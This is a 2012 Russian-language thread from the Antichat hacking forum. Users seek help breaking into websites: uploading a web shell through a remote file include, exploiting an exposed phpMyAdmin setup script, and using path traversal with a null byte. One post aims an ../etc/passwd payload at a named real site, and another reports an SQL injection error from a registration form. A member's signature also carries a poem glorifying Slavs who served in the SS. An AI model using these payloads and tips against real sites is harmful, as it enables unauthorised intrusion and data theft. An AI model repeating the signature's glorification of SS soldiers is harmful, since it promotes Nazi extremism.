 |
|
15.03.2012, 02:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Spunoff
site.com/page.php=about.php выдаёт about.php на сервере
site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте
Можно как-то залить шелл на site.com?
скорее всего это просто ифрейм а не инклуд
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
15.03.2012, 04:00
|
|
Познающий
Регистрация: 16.01.2012
Сообщений: 40
С нами:
7538006
Репутация:
0
|
|
Теперь я знаю какой код на странице
т.е это получается инклуд всё-таки...но почему он при
site.com/page.php=http://shell.com/shell.php показывает шелл, но на моём же хосте?
Подскажите плиз как залить шелл сюда?
register_globals=Off
|
|
|
|
15.03.2012, 04:31
|
|
Постоянный
Регистрация: 27.02.2011
Сообщений: 733
С нами:
8003126
Репутация:
19
|
|
Сообщение от None
показывает шелл, но на моём же хосте?
Скорее всего потомучто выполняеться на твоем хосте?
Переименуй из php в txt и проверь.
|
|
|
|
15.03.2012, 05:04
|
|
Познающий
Регистрация: 16.01.2012
Сообщений: 40
С нами:
7538006
Репутация:
0
|
|
mironich спасибо, помогло
|
|
|
|
15.03.2012, 10:46
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 7
С нами:
7719446
Репутация:
0
|
|
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
Есть ли возможность получить доступ к бд или залить шелл?
Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
Есть ли вообще известные уязвимости под эту версию?
|
|
|
|
15.03.2012, 12:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
Сообщение от JorryGo
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
Есть ли возможность получить доступ к бд или залить шелл?
Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
Есть ли вообще известные уязвимости под эту версию?
https://rdot.org/forum/showpost.php?p=13736&postcount=6
при mq=off и PHP
|
|
|
|
15.03.2012, 12:54
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Faaax
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
|
|
|
|
15.03.2012, 13:18
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от qaz
а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
/thread98525.html
|
|
|
|
15.03.2012, 13:22
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Melfis
/thread98525.html
блин я же написал
Сообщение от None
народ а тут, нужно отсеять окончание, нул байт не помогает
http://proeveryday.ru/index.php?id=../etc/passwd%00
тут читал /thread98525.html но нифига неполучилось, мб недопонял
подскажите как правильно
|
|
|
|
15.03.2012, 13:34
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 2
С нами:
8908056
Репутация:
0
|
|
подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?
ввел например туда '1 и он ошибку вывел
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
